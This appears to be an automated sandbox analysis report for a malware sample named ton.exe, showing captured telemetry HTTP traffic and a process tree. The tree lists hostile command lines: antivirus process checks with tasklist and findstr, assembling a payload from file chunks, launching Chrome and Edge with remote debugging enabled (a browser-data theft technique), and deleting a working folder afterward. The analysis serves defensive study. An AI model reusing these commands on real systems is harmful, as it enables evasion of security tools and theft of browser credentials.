                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:09 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1358
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDEA1B544"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 0c9caffe-701e-005c-61b3-42bb94000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010109Z-174f7845968px8v7hC1EWR08ng00000016zg00000000abyw
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:09 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69 61 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702650" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedia" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    149192.168.2.64985513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:09 UTC192OUTGET /rules/rule703101v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:09 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1393
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE0F93037"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 1a7c28f7-801e-008c-7a00-457130000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010109Z-174f78459684bddphC1EWRbht400000016h00000000031rx
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:09 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 31 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 41 54 53 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 41 54 53 22
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703101" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMATS"


                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                                                                    Start time:19:59:44
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\ton.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\ton.exe"
                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                    File size:1'171'693 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:1AE543F386C7215E1C40F24C93179F77
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                                                                    Start time:19:59:44
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c copy Batch Batch.cmd && Batch.cmd
                                                                                                                                                                                                                                                                                                    Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                                                                    Start time:19:59:44
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                                                                    Start time:19:59:46
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                                                                                    Imagebase:0xb90000
                                                                                                                                                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                                                                    Start time:19:59:46
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                    Commandline:findstr /I "wrsa opssvc"
                                                                                                                                                                                                                                                                                                    Imagebase:0xa00000
                                                                                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                                                                    Start time:19:59:47
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                                                                                    Imagebase:0xb90000
                                                                                                                                                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                                                                    Start time:19:59:47
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                    Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                                    Imagebase:0xa00000
                                                                                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                                                                    Start time:19:59:47
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                    Commandline:cmd /c md 471529
                                                                                                                                                                                                                                                                                                    Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                                                                                    Start time:19:59:47
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                    Commandline:findstr /V "closingscriptsbeachescomplicated" Corners
                                                                                                                                                                                                                                                                                                    Imagebase:0xa00000
                                                                                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                                                                                    Start time:19:59:47
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                    Commandline:cmd /c copy /b ..\Virtue + ..\Economies + ..\Downloading + ..\Gets + ..\Month + ..\Command + ..\Mean + ..\Violin + ..\Original I
                                                                                                                                                                                                                                                                                                    Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                                                                                    Start time:19:59:47
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                    Commandline:Verzeichnis.com I
                                                                                                                                                                                                                                                                                                    Imagebase:0x4a0000
                                                                                                                                                                                                                                                                                                    File size:893'608 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                                    • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                                                                                    Start time:19:59:47
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                    Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                                    Imagebase:0x810000
                                                                                                                                                                                                                                                                                                    File size:28'160 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                                                                                    Start time:20:01:55
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                                                                                    Start time:20:01:56
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2220,i,9226920140352858911,1917441030376040599,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                                                                                    Start time:20:02:10
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                                                                                    Start time:20:02:11
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2508,i,14715817317759310349,9105508345091228975,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                                                                                    Start time:20:02:11
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                                                                                    Start time:20:02:11
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                                                                                    Start time:20:02:16
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                    File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                                                                                    Start time:20:02:16
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                    File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                                                                                                    Start time:20:02:17
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7028 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                                                                                    Start time:20:02:17
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7200 --field-trial-handle=1952,i,2601087111919839350,15526603101436537021,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                                                                                    Start time:20:02:45
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\RQI589ZCBA1V" & exit
                                                                                                                                                                                                                                                                                                    Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:false

